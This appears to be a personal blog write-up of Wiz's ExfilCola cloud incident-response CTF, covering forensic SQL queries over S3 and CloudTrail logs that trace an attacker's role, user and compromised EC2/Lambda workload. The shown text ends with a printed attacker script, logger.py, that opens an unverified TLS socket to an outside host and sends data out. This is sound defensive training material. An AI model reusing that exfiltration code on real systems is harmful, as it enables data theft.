<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Wiz’s Cloud Hunting Games - The ExfilCola Incident" /><meta name="author" content="Kyhle Öhlinger" /><meta property="og:locale" content="en" /><meta name="description" content="Hi all, My name is Kyhle Öhlinger and this blog post forms part of my personal blog. If you enjoy any of the posts, feel free to reach out and let me know :)" /><meta property="og:description" content="Hi all, My name is Kyhle Öhlinger and this blog post forms part of my personal blog. If you enjoy any of the posts, feel free to reach out and let me know :)" /><link rel="canonical" href="https://ohlinger.co/posts/wiz-cloud-hunting-games/" /><meta property="og:url" content="https://ohlinger.co/posts/wiz-cloud-hunting-games/" /><meta property="og:site_name" content="Kyhle Öhlinger" /><meta property="og:image" content="https://ohlinger.co/assets/img/Wiz-Cloud-IR-Challenge/20250507140912.png" /><meta property="og:image:height" content="500" /><meta property="og:image:width" content="800" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2025-05-12T06:00:00-04:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://ohlinger.co/assets/img/Wiz-Cloud-IR-Challenge/20250507140912.png" /><meta property="twitter:title" content="Wiz’s Cloud Hunting Games - The ExfilCola Incident" /><meta name="twitter:site" content="@KyhleO" /><meta name="twitter:creator" content="@KyhleO" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Kyhle Öhlinger","url":"https://github.com/KyhleOhlinger/"},"dateModified":"2025-05-12T06:00:00-04:00","datePublished":"2025-05-12T06:00:00-04:00","description":"Hi all, My name is Kyhle Öhlinger and this blog post forms part of my personal blog. If you enjoy any of the posts, feel free to reach out and let me know :)","headline":"Wiz’s Cloud Hunting Games - The ExfilCola Incident","image":{"width":800,"height":500,"url":"https://ohlinger.co/assets/img/Wiz-Cloud-IR-Challenge/20250507140912.png","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://ohlinger.co/posts/wiz-cloud-hunting-games/"},"url":"https://ohlinger.co/posts/wiz-cloud-hunting-games/"}</script><title>Wiz's Cloud Hunting Games - The ExfilCola Incident | Kyhle Öhlinger</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Kyhle Öhlinger"><meta name="application-name" content="Kyhle Öhlinger"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/Kyhle_Icon.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Kyhle Öhlinger</a></div><div class="site-subtitle font-italic">Lead Security Engineer</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/KyhleOhlinger" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/KyhleO" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['kyhle','ohlinger.co'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://www.linkedin.com/in/kyhleohlinger" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Wiz's Cloud Hunting Games - The ExfilCola Incident</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>Wiz's Cloud Hunting Games - The ExfilCola Incident</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1747044000" data-df="ll" data-toggle="tooltip" data-placement="bottom"> May 12, 2025 </em> </span><div class="mt-3 mb-3"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 800 500'%3E%3C/svg%3E" data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507140912.png" class="preview-img bg" alt="Preview Image" width="800" height="500" data-proofer-ignore></div><div class="d-flex justify-content-between"> <span> By <em> <a href="https://github.com/KyhleOhlinger/">Kyhle Öhlinger</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="3882 words"> <em>21 min</em> read</span></div></div></div><div class="post-content"><p>Wiz recently released <a href="https://www.wiz.io/blog/the-cloud-hunting-games-ctf-challenge">the Cloud Hunting Games</a> featuring the <a href="https://www.cloudhuntinggames.com/?utm_source=blog">The ExfilCola Incident</a> CTF. The goal of the challenge is to step into the shoes of an incident response expert, <em>unfold the steps of the attacker, trace them back to the initial access point, and make sure that the secret formula is safe.</em> This blog post contains the methods that I used while completing this challenge - if you are reading this, I hope you find it useful!</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506094235.png" alt="img-description" data-proofer-ignore> <em>Cloud Hunting Games - Introduction</em></p><p>When you click on the link, you’ll be presented with the home screen for “The Cloud Hunting Games”. Before jumping straight into the investigation, lets click on the “Read Extortion Email” button, the contents of which are shown in the screenshot below: <img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506094404.png" alt="img-description" data-proofer-ignore> <em>Extortion Email sent by FizzShadows</em></p><p>Let’s take note of what we know at this point:</p><ul><li><strong>Time of Initial Email:</strong> May 6, 2025 03:14am<li><strong>Threat Actor:</strong> FizzShadows<li><strong>Target Company:</strong> ExfilCola<li><strong>What Happened?</strong> FizzShadows claim to have exfiltrated ExfilCola’s Secret Recipes<li><strong>Threat:</strong> Releasing sensitive data if 75 Bitcoin are not transferred to a specific bitcoin wallet.</ul><p>The main goal of this investigation will be to confirm whether FizzShadows actually has access to the data that they claim to have. Lets dive in!</p><h1 id="challenge-1---aint-no-data-when-shes-gone">Challenge 1 - Ain’t no data when she’s gone</h1><blockquote class="prompt-info"><div><p>While not explicitly used during this CTF, the <a href="https://securosis.com/blog/aws-cloud-incident-analysis-query-cheatsheet/">AWS Cloud Incident Analysis Query Cheatsheet</a> blog post by Rich Mogul contains a mnemonic (RECIPE PICKS) which is a great resource for performing the initial triage steps during a Cloud incident. If you haven’t seen it yet, I highly recommend reading the post.</p></div></blockquote><p>If you are following along, once you click the “Start Investigation” button, you will be presented with another screen showing a SQLite database and a task for the initial challenge:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506094734.png" alt="img-description" data-proofer-ignore> <em>Challenge 1 - Starting Point</em></p><blockquote><p>FizzShadows claim that they were able to exfiltrate ExfilCola’s secret recipes. You have to validate this claim before considering any further steps. All ExfilCola’s secret recipes are stored in a secured S3 bucket. Luckily, their security team was responsible enough to make sure that S3 data events were collected. You’ve been granted access to these logs, which are available in the s3_data_events table. Go ahead and see if there are any traces of exfiltration: find the IAM role involved in the attack.</p></blockquote><p>The log source that we currently have access to is <code class="language-plaintext highlighter-rouge">s3.amazonaws.com</code>. To determine the initial order of events, we need to look into the data that is held within the database. To make it more readable (or at least logically ordered), you can use the <code class="language-plaintext highlighter-rouge">Order by</code> parameter.</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506101251.png" alt="img-description" data-proofer-ignore> <em>Full S3 Data Events</em></p><p>As shown above, the database had a number of columns that would be useful to us during the investigation. Since this is a data exfiltration investigation, the <strong>GetObject</strong> event will be the likely starting point. Before diving in to the logs, I wanted to get a rough overview of the types of events that can be expected within the environment:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>SELECT  s3_data_events.EventName, count(s3_data_events.EventName) FROM s3_data_events
group by s3_data_events.EventName
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506102154.png" alt="img-description" data-proofer-ignore> <em>Breakdown of S3 Data Events by EventName</em></p><p>The data contained a number of <code class="language-plaintext highlighter-rouge">GetObject</code> events with the majority of events likely being legitimate traffic for the environment. To help narrow down the search, I modified the query to retrieve a breakdown of the types of events the user identities used within the environment, I ran a quick query to count the <code class="language-plaintext highlighter-rouge">event names</code> by the <code class="language-plaintext highlighter-rouge">ARN</code>:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>SELECT s3_data_events.EventTime, count(distinct s3_data_events.EventName), s3_data_events.userIdentity_ARN FROM s3_data_events
group by s3_data_events.userIdentity_ARN
order by count(distinct s3_data_events.EventName) desc
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506103930.png" alt="img-description" data-proofer-ignore> <em>Breakdown of S3 Data Events by ARN</em></p><p>As shown above, most of the identities generally made use of 3 <code class="language-plaintext highlighter-rouge">events</code> or less, however there was one that was above the normal usage within the environment - <code class="language-plaintext highlighter-rouge">S3Reader</code>. Before jumping to conclusions, I also created a query to get an overview of the general activity for the user identities on a day-to-day basis.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>SELECT  s3_data_events.userIdentity_ARN, GROUP_CONCAT(DISTINCT DATE(substr(s3_data_events.EventTime, 1, 10))) AS ActiveDays
FROM s3_data_events
group by s3_data_events.userIdentity_ARN 
order by ActiveDays desc
</pre></table></code></div></div><p>Using the query, the <code class="language-plaintext highlighter-rouge">S3Reader</code> role stood out again as all of the activity occurred on <strong>2025-05-05</strong> and the activity included the <code class="language-plaintext highlighter-rouge">GetObject</code> event. The <code class="language-plaintext highlighter-rouge">tom.c</code> user was also interesting for the same reason:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508114558.png" alt="img-description" data-proofer-ignore> <em>Breakdown of S3 Data Events by Day per User Identity</em></p><h2 id="investigating-tomc-and-s3reader"><span class="mr-2">Investigating Tom.C and S3Reader</span><a href="#investigating-tomc-and-s3reader" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>I decided to start by investigating these two suspicious users since they both had the <code class="language-plaintext highlighter-rouge">GetObject</code> event associated with their accounts the day before the extortion email was sent to ExfilCola. Using the user identities as a starting point, we can retrieve the requests that they made to the server:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>SELECT s3_data_events.EventTime, s3_data_events.EventName, s3_data_events.requestParameters, s3_data_events.IP FROM s3_data_events
where s3_data_events.userIdentity_ARN = "arn:aws:iam::509843726190:user/tom.c"
order by s3_data_events.EventTime desc
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508115042.png" alt="img-description" data-proofer-ignore> <em>GetObject Events performed by Tom.C</em></p><p>As shown above, the <code class="language-plaintext highlighter-rouge">Tom.C</code> user retrieved a few files including the “TOP SECRET” file from the S3 Bucket! We can use the same commands to retrieve the information for the <code class="language-plaintext highlighter-rouge">S3Reader</code> identity:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>SELECT s3_data_events.EventTime, s3_data_events.EventName, s3_data_events.requestParameters, s3_data_events.IP FROM s3_data_events
where s3_data_events.userIdentity_ARN = "arn:aws:sts::509843726190:assumed-role/S3Reader/drinks"
order by s3_data_events.EventTime desc
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506104403.png" alt="img-description" data-proofer-ignore> <em>GetObject Events performed by S3Reader</em></p><p>As shown above, the events for the <code class="language-plaintext highlighter-rouge">S3Reader</code> include a large number of <code class="language-plaintext highlighter-rouge">GetObject</code> events and terminate in a <strong>PutObject</strong> event where the user added <code class="language-plaintext highlighter-rouge">letter.txt</code> to the <code class="language-plaintext highlighter-rouge">soda-vault</code> bucket. Since the <code class="language-plaintext highlighter-rouge">S3Reader</code> role should only have Read based permissions, the fact that it not only retrieved files from the server but ended by placing an object on the server was highly suspicious and this is where I decided to focus my effort.</p><ul><li><strong>Suspicious User Identity:</strong> arn:aws:sts::509843726190:assumed-role/S3Reader/drinks<li><strong>Event(s):</strong> GetObject, PutObject<li><strong>First Access:</strong> 2025-05-05T12:47:00Z<li><strong>Last Access:</strong> 2025-05-05T12:52:00Z<li><strong>IP Address:</strong> 37.19.199.135</ul><blockquote class="prompt-info"><div><p>This analysis was correct and resulted in the successful submission of the flag: <strong>arn:aws:sts::509843726190:assumed-role/S3Reader/drinks</strong></p></div></blockquote><h1 id="challenge-2-follow-follow-the-trail">Challenge 2: Follow, follow the trail</h1><blockquote><p>So you have managed to validate FizzShadows’ claim and track the IAM role that has exfiltrated ExfilCola’s recipe. You’ve been granted access to the cloudtrail table. Follow the trail of the S3Reader. Who used it?</p></blockquote><p>Challenge 2 started in the same fashion with access to a SQLite database. However, we now had access to Cloudtrail logs for the investigation:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>SELECT * FROM cloudtrail
where cloudtrail.userIdentity_ARN = "arn:aws:sts::509843726190:assumed-role/S3Reader/drinks"
order by cloudtrail.EventTime ASC 
</pre></table></code></div></div><p>To start the investigation, I queried the logs for activity performed by the <code class="language-plaintext highlighter-rouge">S3Reader</code> identity:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506110156.png" alt="img-description" data-proofer-ignore> <em>Cloudtrail Search for the S3Reader User Identity</em></p><p>As shown above, the query produced a single result. Since we’re looking for the user that used (assumed) the role, we can pivot to look for <code class="language-plaintext highlighter-rouge">AssumeRole</code> events. We already know the name of the affected user identity so we can modify the query to look for request or response parameters containing the <code class="language-plaintext highlighter-rouge">S3Reader</code> role with the session name <code class="language-plaintext highlighter-rouge">Drinks</code>:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>SELECT cloudtrail.EventTime, cloudtrail.userIdentity_ARN, cloudtrail.userIdentity_userName, cloudtrail.IP, cloudtrail.IP_Country,cloudtrail.UserAgent FROM cloudtrail
where cloudtrail.EventTime LIKE "2025-05-05%" and cloudtrail.EventName = "AssumeRole" and 
(
  (cloudtrail.requestParameters like '%S3Reader%' and cloudtrail.requestParameters like '%drinks%') or 
  (cloudtrail.responseElements like '%S3Reader%' and cloudtrail.requestParameters like '%drinks%')
)
order by cloudtrail.EventTime desc 
</pre></table></code></div></div><p>Running the above query produced a single user identity that used the session name <code class="language-plaintext highlighter-rouge">Drinks</code> for the <code class="language-plaintext highlighter-rouge">S3Reader</code> role:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506111324.png" alt="img-description" data-proofer-ignore> <em>Identifying the Initial Access Role - Moe Jito</em></p><ul><li><strong>Suspicious User:</strong> Moe.Jito<li><strong>Event Name:</strong> AssumeRole<li><strong>Role Assumption Time:</strong> 2025-05-05T12:43:21Z<li><strong>IP Address:</strong> 109.236.81.188</ul><blockquote class="prompt-info"><div><p>This analysis was correct and resulted in the successful submission of the flag: <strong>Moe.Jito</strong></p></div></blockquote><h1 id="challenge-3--deeper-into-the-trail">Challenge 3: Deeper into the trail</h1><blockquote><p>Bingo — you’ve tracked down the compromised IAM user: Moe.Jito. Keep digging through the CloudTrail logs. Follow the attacker’s footsteps and find the machine that was compromised and leveraged for lateral movement.</p></blockquote><p>Challenge 3 also had access to Cloudtrail logs using the SQLite database. As a starting point, I retrieved the events associated with the user <code class="language-plaintext highlighter-rouge">Moe.Jito</code>:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>SELECT cloudtrail.EventTime, cloudtrail.EventName, cloudtrail.userIdentity_userName, cloudtrail.IP, cloudtrail.requestParameters, cloudtrail.responseElements FROM cloudtrail
where cloudtrail.userIdentity_userName = "Moe.Jito"
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506111729.png" alt="img-description" data-proofer-ignore> <em>Cloudtrail Search for Activity Performed by Moe.Jito</em></p><p>The attacker started by using the <code class="language-plaintext highlighter-rouge">ListAttachedUserPolicies</code> event at <code class="language-plaintext highlighter-rouge">2025-05-05T12:40:26Z</code> from the IP Address <code class="language-plaintext highlighter-rouge">109.236.81.188</code>. While that displays the events that the user performed, we’re interested in the events leading to the compromise of the <code class="language-plaintext highlighter-rouge">Moe.Jito</code> user. To help narrow down this part of the investigation, I listed the Cloudtrail events around the time of the account compromise (between 12pm - 1pm):</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>SELECT count(cloudtrail.EventName), cloudtrail.EventName FROM cloudtrail
where cloudtrail.EventTime LIKE '%2025-05-05T12%'
group by cloudtrail.EventName
</pre></table></code></div></div><p>As shown below, there were a number of events between 12pm - 1pm. There are a few suspicious events however the one that sticks out the most is the <code class="language-plaintext highlighter-rouge">UpdateFunctionCode20150331v2</code> event:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506112632.png" alt="img-description" data-proofer-ignore> <em>Cloudtrail Search for All Cloudtrail Events between 12pm - 1pm</em></p><p>While the <code class="language-plaintext highlighter-rouge">CreateAccessKey</code> and <code class="language-plaintext highlighter-rouge">DeleteAccessKey</code> events can be used for persistence, they wouldn’t be the intial access point to the machine that was compromised. The <a href="https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionCode.html">UpdateFunctionCode</a> event is used to update the function code for a Lambda function in AWS. If the Lambda function is configured incorrectly, a malicious user can update the functions code and use it to perform actions on behalf of the role. Since this was the only event related to a “machine” during that timeframe, I used the following query to retrieve the role associated with the Lambda function and the associated request parameters:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>SELECT cloudtrail.EventTime, cloudtrail.EventSource, cloudtrail.userIdentity_ARN, cloudtrail.requestParameters, cloudtrail.responseElements FROM cloudtrail
where cloudtrail.EventName = "UpdateFunctionCode20150331v2"
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250508120033.png" alt="img-description" data-proofer-ignore> <em>Cloudtrail Search for the UpdateFunctionCode Event</em></p><ul><li><strong>Compromised Machine:</strong> arn:aws:sts::509843726190:assumed-role/lambdaWorker/i-0a44002eec2f16c25<li><strong>Function Name:</strong> Credsrotator<li><strong>Time of Machine Compromise</strong>: 2025-05-05T12:32:42Z<li><strong>IP Address:</strong> 54.227.18.169</ul><blockquote class="prompt-info"><div><p>This analysis was correct and resulted in the successful submission of the flag: <strong>i-0a44002eec2f16c25</strong></p></div></blockquote><h1 id="challenge-4--aint-no-mountain-high-enough-to-keep-me-away-from-my-logs">Challenge 4: Ain’t no mountain high enough to keep me away from my logs</h1><blockquote><p>Great progress! As you continue your investigation, you discover that once the attacker compromised the EC2 machine, they were able to manipulate a Lambda function to gain access to multiple IAM users. ExfilCola has granted you root access to the EC2 machine where this activity originated from. But the question remains - how did the attacker gain access to this machine? Your task is to find the IP address of another ExfilCola workload that was used as the initial entry point into the organization.</p></blockquote><p>Now that we’ve identified the exploited workload, we have been granted root access to the machine <code class="language-plaintext highlighter-rouge">ssh-fetcher</code>. However, when attempting to perform some basic enumeration on the host there didn’t seem to be many tools installed:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506114433.png" alt="img-description" data-proofer-ignore> <em>Initial Access- Failed Attempts at Enumeration</em></p><p>While I couldn’t run a large number of commands as the binaries were removed from the machine, I was still able to list the running processes:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506114619.png" alt="img-description" data-proofer-ignore> <em>Intial Access - Process List</em></p><p>There wassn’t a lot to go off of except for the <code class="language-plaintext highlighter-rouge">healthcheck</code> command. Running the command showed a <code class="language-plaintext highlighter-rouge">Usage</code> option with a link to the <code class="language-plaintext highlighter-rouge">/var/log</code> directory:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506115520.png" alt="img-description" data-proofer-ignore> <em>Output of the Healthcheck Command and Associated Files</em></p><p>I navigated to the directory to the to see if there were any logs which may assist during the investigation. As shown above, the only log that existed was <code class="language-plaintext highlighter-rouge">.gK8du9</code> which contained the text: <strong>“FizzShadows were here…“</strong>.</p><p>Since there were no additional processes running on the host, I decided to take a step back. I navigated to the home directory and saw that the machine had 2 interactive user accounts associated with it: <strong>postgresql-user</strong> and <strong>user</strong>. The <strong>user</strong> profile seemed unused as it only contained a <code class="language-plaintext highlighter-rouge">.bashrc</code> file however the <strong>postrgresql-user</strong> profile had a few scripts and a <code class="language-plaintext highlighter-rouge">.ssh</code> directory:</p><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250506120225.png" alt="img-description" data-proofer-ignore> <em>Postgresql-user’s Home Directory</em></p><h2 id="diving-in-to-the-files---loggerpy"><span class="mr-2">Diving in to the Files - Logger.py</span><a href="#diving-in-to-the-files---loggerpy" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>With access to the directory, I started by investigating the files on hand. The contents of the <code class="language-plaintext highlighter-rouge">logger.py</code> file is provided below:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>import socket,os,pty,ssl
def validate(text):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        wrappedSocket = context.wrap_socket(s)
        wrappedSocket.connect(("fetcher.exfilcola.io",8443))
        wrappedSocket.send(repr(text).encode('utf-8'))
